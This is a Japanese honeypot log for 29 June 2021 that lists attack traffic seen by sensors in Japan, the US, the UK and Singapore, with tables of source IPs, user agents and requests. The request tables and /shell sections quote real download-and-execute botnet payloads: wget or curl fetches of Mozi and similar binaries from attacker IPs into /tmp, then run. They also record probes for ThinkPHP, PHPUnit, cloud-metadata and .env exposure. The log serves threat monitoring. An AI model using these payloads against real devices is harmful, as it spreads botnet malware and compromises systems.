ハニーポット(仮) 観測記録 2021/06/29分です。
特徴
共通
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為
Location:JP
ZeroShell Linux Routerの脆弱性(CVE-2020-29390)を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
/.envへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 162.55.171.138/jaws; sh /tmp/jaws
Location:US
DrayTek製品の脆弱性を狙うアクセス
Drupalの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
XTCによるスキャン行為
ZmEuによるスキャン行為
.cssへのスキャン行為
.jsへのスキャン行為
/.envへのスキャン行為
phpMyAdminへのスキャン行為
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 104.168.98.105/bins/z0r0.arm7; chmod 777 /tmp/z0r0.arm7; sh /tmp/z0r0.arm7 7Binks.Rep.Jaws
Location:UK
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//27[.]45[.]90[.]190:45806/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
Wgetによるスキャン行為
/.envへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//115[.]61[.]160[.]112:33077/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:52 (前日比:-18)
US:総アクセス数:234 (前日比:+191)
UK:総アクセス数:38 (前日比:-4)
SG:総アクセス数:52 (前日比:+11)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.57.122.53 | Romania |
7 | 4.71.37.45 | United States |
1 | 35.178.91.43 | United States |
1 | 40.77.17.11 | United States |
1 | 41.86.5.103 | Liberia |
1 | 42.232.224.124 | China |
11 | 45.146.165.123 | Russia |
1 | 52.224.55.170 | United States |
1 | 80.82.70.228 | United Kingdom |
1 | 82.165.189.67 | Germany |
1 | 104.210.211.179 | United States |
1 | 110.46.194.213 | South Korea |
5 | 111.7.96.140 | China |
1 | 124.130.118.243 | China |
1 | 134.119.189.158 | Germany |
1 | 161.35.154.103 | United States |
1 | 161.35.236.158 | United States |
1 | 165.22.210.88 | United States |
1 | 167.99.189.198 | United States |
1 | 176.10.99.200 | Switzerland |
2 | 179.43.187.242 | Panama |
1 | 183.136.225.14 | China |
1 | 192.228.100.100 | United States |
1 | 192.241.209.34 | United States |
1 | 192.241.214.186 | United States |
1 | 192.241.214.195 | United States |
1 | 199.19.224.201 | United States |
1 | 209.141.49.75 | United States |
3 | 216.4.95.61 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
19 | - |
4 | Chrome/54.0 (Windows NT 10.0) |
1 | Hello, World |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
8 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
1 | Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) |
3 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | |||
1 | \x16\x03 | ||
3 | \x16\x03\x01\x01\xfa\x01 | ||
1 | \x16\x03\x02\x01o\x01 | ||
8 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=user&psd=user | HTTP/1.0 |
10 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
1 | GET | /console/ | HTTP/1.1 |
3 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 162.55.171.138/jaws;sh+/tmp/jaws | |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//169[.]254[.]169[.]254/latest/meta-data/ | HTTP/1.1 |
2 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
4 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 1.10.150.40 | Thailand |
1 | 2.57.122.53 | Romania |
1 | 3.0.145.111 | United States |
1 | 40.76.236.126 | United States |
1 | 45.9.150.27 | Dominica |
6 | 45.61.184.166 | United States |
22 | 45.146.165.123 | Russia |
1 | 45.229.54.111 | Brazil |
2 | 47.93.23.61 | China |
7 | 47.245.57.120 | United States |
1 | 51.13.103.24 | United Kingdom |
3 | 51.158.78.179 | France |
1 | 68.183.8.215 | United States |
1 | 68.183.178.112 | United States |
1 | 74.102.39.43 | United States |
149 | 101.36.109.176 | Hong Kong |
1 | 120.82.119.104 | China |
1 | 120.85.198.90 | China |
1 | 129.213.160.208 | United States |
6 | 135.125.246.189 | France |
1 | 138.197.172.189 | United States |
1 | 142.93.222.8 | United States |
1 | 143.110.176.242 | United States |
1 | 143.110.220.177 | United States |
1 | 157.245.217.213 | United States |
1 | 159.65.19.132 | United States |
1 | 159.203.56.32 | United States |
1 | 162.62.123.46 | Singapore |
1 | 165.22.108.147 | United States |
1 | 165.227.224.121 | United States |
1 | 167.99.73.19 | United States |
1 | 178.62.207.158 | United States |
1 | 178.128.111.100 | United States |
1 | 178.128.113.207 | United States |
1 | 179.43.187.242 | Panama |
1 | 183.136.225.14 | China |
1 | 190.180.154.86 | Argentina |
1 | 192.241.213.192 | United States |
1 | 192.241.220.166 | United States |
1 | 192.241.222.160 | United States |
1 | 199.19.224.201 | United States |
1 | 199.19.225.175 | United States |
2 | 209.141.49.75 | United States |
1 | 220.134.146.95 | Taiwan |
1 | 223.149.162.216 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
58 | - |
1 | Hello, world |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:78.0) Gecko/20100101 Firefox/78.0 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.52 |
117 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 |
22 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
9 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
5 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) |
3 | Mozilla/5.0 zgrab/0.x |
1 | Wget/1.18 (linux-gnu) |
1 | XTC |
6 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
31 | - | ||
1 | \x16\x03\x01\x014\x01 | ||
15 | \x16\x03\x01\x01\xfb\x01 | ||
3 | \x16\x03\x01\x02 | ||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
1 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
10 | GET | /.env | HTTP/1.1 |
2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
2 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /Content/common/web/CommonActivity.css | HTTP/1.1 |
1 | GET | /Content/css/wzwstylel.css | HTTP/1.1 |
1 | GET | /Content/favicon.ico | HTTP/1.1 |
1 | GET | /Css/Hm.css | HTTP/1.1 |
1 | GET | /HNAP1 | HTTP/1.1 |
1 | GET | /HNAP1/ | HTTP/1.1 |
1 | GET | /Home/Bind/binding | HTTP/1.1 |
1 | GET | /Home/Get/getJnd28 | HTTP/1.1 |
1 | GET | /Home/GetAllGameCategory | HTTP/1.1 |
1 | GET | /Home/Index/ajaxTJ | HTTP/1.1 |
1 | GET | /JS/loginstatus.js | HTTP/1.1 |
1 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /Pc/Lang/index.html | HTTP/1.1 |
1 | GET | /Promotions/list.mvc | HTTP/1.1 |
1 | GET | /Public/Home/images/game/pk10.png | HTTP/1.1 |
1 | GET | /Public/Home/js/cls.js | HTTP/1.1 |
1 | GET | /Public/Home/js/common.js | HTTP/1.1 |
1 | GET | /Public/Mobile/ecshe_css/wapmain.css?v=1545408652 | HTTP/1.1 |
1 | GET | /Public/home/js/check.js | HTTP/1.1 |
1 | GET | /Public/home/wap/css/qdgame.css | HTTP/1.1 |
1 | GET | /Public/initJs.php | HTTP/1.1 |
1 | GET | /Public/js/common.js | HTTP/1.1 |
1 | GET | /Public/mobile/js/config.js | HTTP/1.1 |
1 | GET | /Recruit/download_url | HTTP/1.1 |
1 | GET | /Template/Mobile/js/main.js | HTTP/1.1 |
1 | GET | /Templates/user/finance/css/userPay.css | HTTP/1.1 |
1 | GET | /Templates/user/js/global.js | HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/health | HTTP/1.1 |
1 | GET | /admin/index | HTTP/1.1 |
1 | GET | /ajax/allcoin_a/id/0?t=0.3782499195965951 | HTTP/1.1 |
1 | GET | /ajax?act=getrlist&rid=1 | HTTP/1.1 |
1 | GET | /api/ApiHub/fetchJinse | HTTP/1.1 |
1 | GET | /api/apps | HTTP/1.1 |
1 | GET | /api/contactWay | HTTP/1.1 |
1 | GET | /api/content_bottom | HTTP/1.1 |
1 | GET | /api/exclude/siteConfig/webSiteConfig | HTTP/1.1 |
1 | GET | /api/message/webInfo | HTTP/1.1 |
1 | GET | /api/product/topRank?token=null&uid=null&lang=null&direct=1&type=1 | HTTP/1.1 |
1 | GET | /api/stock/getSingleStock.do?code=002405 | HTTP/1.1 |
1 | GET | /api/uploads/apimap | HTTP/1.1 |
1 | GET | /api/user/info?&&callback=jsonp_1601457046411_20983 | HTTP/1.1 |
1 | GET | /api/v/index/queryOfficePage?officeCode=customHomeLink | HTTP/1.1 |
1 | GET | /api/v1/invest | HTTP/1.1 |
1 | GET | /api/v1/member/kefu | HTTP/1.1 |
1 | GET | /api/wallet/redDetail | HTTP/1.1 |
1 | GET | /assets/dist/static/js/vendor_prod.js | HTTP/1.1 |
1 | GET | /assets/js/dmshub.js | HTTP/1.1 |
1 | GET | /assets/room/css/room_mobile.css | HTTP/1.1 |
1 | GET | /base/exchange_article/index/classid/1/id/1 | HTTP/1.1 |
1 | GET | /base/exchange_index/changepwdfirst | HTTP/1.1 |
1 | GET | /base/exchange_index/googlecode | HTTP/1.1 |
1 | GET | /common/download.js | HTTP/1.1 |
1 | GET | /common/template/lottery/lecai/css/style.css | HTTP/1.1 |
1 | GET | /config.js | HTTP/1.1 |
1 | GET | /config.php?_=3283&1922563758 | HTTP/1.1 |
2 | GET | /console/ | HTTP/1.1 |
1 | GET | /csjs/bankCheck.js | HTTP/1.1 |
1 | GET | /css/dafa.css | HTTP/1.1 |
1 | GET | /css/main.css | HTTP/1.1 |
1 | GET | /css/style.css | HTTP/1.1 |
1 | GET | /evox/about | HTTP/1.1 |
3 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /ff/css/cssy.css | HTTP/1.1 |
1 | GET | /files/pub_rem.js | HTTP/1.1 |
1 | GET | /files/pub_reset.css | HTTP/1.1 |
1 | GET | /getConfig/getArticle.do?code=19 | HTTP/1.1 |
1 | GET | /getConfig/listPopFrame.do?code=14&position=index&_=1601489645097 | HTTP/1.1 |
1 | GET | /getLocale | HTTP/1.1 |
2 | GET | /h5/ | HTTP/1.1 |
1 | GET | /homes/ | HTTP/1.1 |
1 | GET | /iframe/rankgiftgotapi/1005 | HTTP/1.1 |
1 | GET | /im/in/GetUuid | HTTP/1.1 |
2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /index/Mobile/kline_week?code=sz003043 | HTTP/1.1 |
1 | GET | /index/index/andiro | HTTP/1.1 |
1 | GET | /infe/rest/flash/getServerIP.json | HTTP/1.1 |
1 | GET | /js/app.ling.js | HTTP/1.1 |
1 | GET | /js/base.js | HTTP/1.1 |
1 | GET | /js/dianzan.js | HTTP/1.1 |
1 | GET | /js/tvConfig.js | HTTP/1.1 |
1 | GET | /kkrps/im_group/show_members | HTTP/1.1 |
1 | GET | /loan | HTTP/1.1 |
1 | GET | /login/img/nyyh/chkjs.js | HTTP/1.1 |
1 | GET | /login/img/nyyh/game.css | HTTP/1.1 |
1 | GET | /m/ | HTTP/1.1 |
1 | GET | /m/ticker/usdtqc | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/js/left.js | HTTP/1.1 |
1 | GET | /mobile/script/main.m.js | HTTP/1.1 |
1 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /nmaplowercheck1624917704 | HTTP/1.1 |
1 | GET | /otc/ | HTTP/1.1 |
1 | GET | /pages/console/js/common.js | HTTP/1.1 |
1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
1 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /portal/index/protocol.html | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /public/wap/js/basis.js | HTTP/1.1 |
1 | GET | /resources/main/common.js | HTTP/1.1 |
1 | GET | /room/1002 | HTTP/1.1 |
1 | GET | /s_api/basic/config_js?callback=__set_config | HTTP/1.1 |
1 | GET | /s_api/basic/download/info | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//1[.]10[.]150[.]40:43543/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//45[.]229[.]54[.]111:53995/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+104.168.98.105/bins/z0r0.arm7;chmod+777+/tmp/z0r0.arm7;sh+/tmp/z0r0.arm7+7Binks.Rep.Jaws | HTTP/1.1 |
1 | GET | /site.js | HTTP/1.1 |
1 | GET | /site/get-hq?proNo=btc&panType=1&pid=1 | HTTP/1.1 |
1 | GET | /skin/js/common.js | HTTP/1.1 |
2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /static/css/index.css | HTTP/1.1 |
1 | GET | /static/data/thirdgames.json | HTTP/1.1 |
1 | GET | /static/guide/ab.css | HTTP/1.1 |
1 | GET | /static/home/static/js/login.js | HTTP/1.1 |
1 | GET | /static/index/js/lk/order.js | HTTP/1.1 |
1 | GET | /static/wap/css/index.css | HTTP/1.1 |
1 | GET | /static/wap/js/common.js | HTTP/1.1 |
1 | GET | /static/xianyu/js/bankCheck.js | HTTP/1.1 |
1 | GET | /stock/search.html?keyword=00202 | HTTP/1.1 |
1 | GET | /style.css | HTTP/1.1 |
1 | GET | /template/920ka/css/lsy.css | HTTP/1.1 |
1 | GET | /template/920ka/js/woodyapp.js | HTTP/1.1 |
1 | GET | /thriveGame.css | HTTP/1.1 |
1 | GET | /user/Login | HTTP/1.1 |
2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
1 | GET | /wap/api/exchangerateuserconfig!get.action | HTTP/1.1 |
1 | GET | /wap/trading/get_newallorder_ajax | HTTP/1.1 |
1 | GET | /wap/trading/lastKlineParameter | HTTP/1.1 |
1 | GET | /web/api/getBanner | HTTP/1.1 |
2 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | /wp-login.php | HTTP/1.1 |
1 | GET | /ws/index/getTheLotteryInitList | HTTP/1.1 |
1 | GET | /xy/image/jiantou.png | HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | OPTIONS | / | HTTP/1.0 |
2 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
2 | POST | /HNAP1/ | HTTP/1.0 |
2 | POST | /api/jsonws/invoke | HTTP/1.1 |
1 | POST | /api/system/system/config/get | HTTP/1.1 |
5 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
1 | POST | /config | HTTP/1.1 |
1 | POST | /login/kefuxian.mvc | HTTP/1.1 |
1 | POST | /m.api | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax | HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//withthis[.]site/7229ebd93edecfa44c3a78bc9bad771920404c83330a318129cac9fd0619797b6f9086bedce0d3cbf64825016d01bc06aa24cec28224599f5a6997cadcf14c70ab03ef943e1b3ac29989c7a28be7e5215140c1e8bf550b55221f7eb21e343913 | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 27.45.90.190 | China |
11 | 45.146.165.123 | Russia |
1 | 103.47.104.224 | India |
1 | 115.53.252.153 | China |
1 | 117.251.58.79 | India |
10 | 118.25.227.72 | China |
1 | 120.85.93.0 | China |
1 | 128.199.0.53 | United Kingdom |
1 | 134.209.199.138 | United States |
1 | 162.62.123.46 | Singapore |
1 | 179.43.187.242 | Panama |
1 | 192.241.213.224 | United States |
1 | 192.241.214.224 | United States |
1 | 199.19.224.153 | United States |
1 | 199.19.224.201 | United States |
2 | 199.19.225.175 | United States |
2 | 209.141.49.75 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
6 | - |
1 | Go-http-client/1.1 |
1 | Hello, World |
1 | Hello, world |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
6 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
2 | Mozilla/5.0 zgrab/0.x |
1 | python-requests/2.18.4 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x16\x03\x01\x01\xfc\x01 | ||
1 | 27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ | HTTP/1.0 | |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /TP/html/public/index.php | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
2 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 | HTTP/1.0 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /elrekt.php | HTTP/1.1 |
1 | GET | /html/public/index.php | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
1 | GET | /manager/html | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /nice%20ports%2C/Tri%6Eity.txt%2ebak | HTTP/1.0 |
1 | GET | /public/index.php | HTTP/1.1 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]45[.]90[.]190:45806/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | HEAD | / | HTTP/1.0 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /HNAP1/ | HTTP/1.0 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
6 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /index.php?s=captcha | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
3 | 37.49.225.132 | Belize |
3 | 43.226.153.11 | China |
1 | 45.9.150.27 | Dominica |
11 | 45.146.165.123 | Russia |
1 | 47.241.253.80 | United States |
1 | 59.94.203.148 | India |
10 | 60.205.137.46 | China |
1 | 89.248.165.165 | United Kingdom |
1 | 103.28.70.137 | United States |
1 | 115.61.160.112 | China |
1 | 138.68.157.241 | United States |
3 | 163.172.159.134 | United Kingdom |
2 | 179.43.187.242 | Panama |
1 | 183.136.225.14 | China |
1 | 192.241.217.22 | United States |
1 | 192.241.219.222 | United States |
1 | 192.241.222.133 | United States |
2 | 198.232.118.99 | United States |
1 | 199.19.224.201 | United States |
4 | 199.19.225.175 | United States |
1 | 209.141.49.75 | United States |
1 | 211.171.233.177 | South Korea |
UserAgent一覧
件数 | UserAgent |
---|---|
11 | - |
1 | Hello, World |
1 | Hello, world |
2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3; rv:52.7.2) Gecko/20100101 Firefox/52.7.2 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3464.0 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
8 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
3 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) |
3 | Mozilla/5.0 zgrab/0.x |
1 | Wget/1.18 (linux-gnu) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 | ||
1 | \x16\x03\x01\x014\x01 | ||
6 | \x16\x03\x01\x02 | ||
1 | CONNECT | www[.]bing[.]com/:443 | HTTP/1.1 |
6 | GET | /.env | HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
1 | GET | /?a=fetch&content= |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution | HTTP/1.1 |
1 | GET | /actuator/health | HTTP/1.1 |
1 | GET | /console/ | HTTP/1.1 |
1 | GET | /evox/about | HTTP/1.1 |
2 | GET | /favicon.ico | HTTP/1.1 |
1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 | HTTP/1.1 |
1 | GET | /manager/text/list | HTTP/1.1 |
1 | GET | /nmaplowercheck1624859870 | HTTP/1.1 |
1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
1 | GET | /phpmyadmin4.8.5/index.php | HTTP/1.1 |
1 | GET | /pmd/index.php | HTTP/1.1 |
1 | GET | /portal/redlion | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//59[.]94[.]203[.]148:53380/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]61[.]160[.]112:33077/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | GET | /wp-content/plugins/wp-file-manager/readme.txt | HTTP/1.1 |
1 | GET | http[:]//passport[.]baidu[.]com/ | HTTP/1.1 |
1 | GET | http[:]//www[.]bing[.]com/ | HTTP/1.1 |
1 | HEAD | / | HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml | HTTP/1.1 |
1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
1 | POST | /api/jsonws/invoke | HTTP/1.1 |
8 | POST | /boaform/admin/formLogin | HTTP/1.1 |
1 | POST | /sdk | HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
1 | POST | http[:]//impius[.]fun/0ccf4fab7bf74a3889c531a3db740b505ff3f867983de8f497cccf7f74041aa1238ff65fe62f01f240e5d6519920dffed2388471fbfcacd9cc03eaf0700820e5cc5b3118b9883e5c4ac5079e35c16fbb317e3ce92d3fbc8f5b226655dfd78187 | HTTP/1.1 |